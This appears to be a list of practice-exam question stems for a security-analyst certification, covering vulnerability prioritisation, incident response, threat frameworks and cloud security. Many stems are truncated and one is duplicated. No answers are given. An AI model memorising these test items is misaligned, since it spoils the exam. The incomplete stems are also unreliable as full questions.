- A security analyst needs to identify which asset should be remediated first based on the provided CVSS scores. Which asset should be prioritized?
- Which of the following best describes root cause analysis?
- A web developer reports an error on a development server while testing a new application. Which tool can be used to identify the application's point of failure?
- Which of the following choices is most likely to cause obstacles in vulnerability remediation?
- Which of the following is the most difficult for threat actors to change according to the Pyramid of Pain model?
- Which of the following best describes a company's risk appetite?
- A security analyst wants to integrate two different SaaS-based security tools so one can notify the other when a threat is detected. What should be used to best ...
- An MSSP received several alerts from customer 1, causing a missed incident response deadline for customer 2. Which document was violated?
- The security team reviews a web server for XSS and runs an Nmap scan. Which option most accurately describes the result?
- A security analyst reviews MFA logs showing multiple successful MFA logins for a user from different geographic locations within short timeframes. Which events ...
- During an internal code review, software called “ACE” was found to have a vulnerability allowing arbitrary code execution in a legacy third-party vendor resourc ...
- Which of the following is the main concept behind the use of an attack methodology framework?
- An analyst sees that a previously remediated vulnerability has reappeared on a database server. What is the most likely cause?
- An employee is suspected of misusing a company-issued laptop and has been suspended pending an HR investigation. What is the best step to preserve evidence?
- A SOC analyst reviews SIEM logs showing failed logins, a successful login, a password change, and the user being added to the enterprise admin group. Which atta ...
- A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and identify URLs that should be denied access prior to d ...
- A security analyst is identifying vulnerabilities on laptops that frequently leave the office, causing inaccurate scan metrics. Which change should be proposed ...
- When migrating multiple SaaS applications to the cloud, which service model would have reduced the complexity of extending identity and access management to clo ...
- A security analyst is assessing a cloud environment and receives an authentication error indicating the instance was not found in the preset location. What shou ...
- A Chief Information Security Officer wants a dashboard to share critical vulnerability management goals with company leadership. What should be included?
- Based on the vulnerability scan results and asset context, what would the vulnerability team most likely do to determine remediation prioritization?
- A malicious actor has gained access to an internal network via social engineering and wants to maintain access to continue the attack. Which stage of the Cyber ...
- An incident response team found IoCs on a critical server and needs to isolate it. Which data should be collected first to preserve sensitive information before ...
- Which of the following is the best technical method to protect sensitive data at an organizational level?
- Using open-source intelligence from technical forums, a threat actor compiles and tests a malicious downloader to evade endpoint detection. Which Cyber Kill Cha ...
- A SOC receives multiple alerts related to a cloud tenant and needs to identify the initial compromise. What should the analyst do first?
- Which of the following hosts is violating the organization's server policies?
- An organization wants to ensure its cloud infrastructure has a hardened configuration by creating a secure server image template. Which resource is best to ensu ...
- A SOC manager reviewed findings from the last tabletop exercise to identify strengths and weaknesses and make improvements. What should be used to improve the p ...
- A cybersecurity analyst wants emails with links or attachments to be tested before reaching the mail server. What will the analyst most likely recommend?
- A SOC analyst finds the following in debugger output for a client-server application. What is the most likely vulnerability?
- Which of the following best explains the importance of playbooks for incident response teams?
- An analyst reviews CVSS v3.1 metrics for a critical zero-day vulnerability. Which option represents the exploit code maturity?
- An analyst wants to track how quickly vulnerabilities are identified. Which metric is best?
- A security manager wants a group of analysts who participate in both penetration testing and defending the company’s network during exercises. Which team should ...
- A threat intelligence analyst updates a document using the MITRE ATT&CK framework and notes the behavior: “The malicious actor will attempt to achieve unauthori ...
- An incident responder recovered a binary file from network traffic and found it on multiple machines with anomalous behavior. Which process would most likely be ...
- An organization wants to establish a disaster recovery plan for critical on-premises applications. What is the first step to prepare for this requirement?
- Which of the following security operations tasks are ideal for automation?
- Which of the following is a reason proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident re ...
- A server was recently compromised. Which artifact should be collected first before disconnecting the server from the network?
- A vulnerability analyst must choose which vulnerabilities to remediate based on CVSS 3.1 base scores. Which represents the least impactful risk?
- Which metric should be used to measure the degree to which a system, application, or user base is affected by an uptime availability outage?
- Which of the following provides the most granular controls for a given tactic or technique?
- During an investigation, an analyst discovers a host is infected with malware and wants to prevent its spread while still allowing further investigation. What i ...
- A SOC analyst runs the following command to display specific traffic: $ tshark -r file.pcap -Y "http or udp" What will the command display?
- A CVE is exploitable only on shared physical or logical network resources and cannot traverse a Layer 3 (OSI) boundary. Which attack vector most likely applies?
- An analyst is configuring a SIEM to capture fileless malware execution events. Which log file requires additional configuration to accomplish this?
- A vulnerability management team conducts a scan on an IP address showing suspicious behavior. What is the first step toward remediation?
- Which of the following describes a risk that exists before implementing security controls?
- After a risk analysis, a company purchases cybersecurity insurance. Which type of risk management strategy is this?
- An incident response manager conducts a tabletop exercise. Which step should be taken next?
- An incident response manager conducts a tabletop exercise. Which step should be taken next?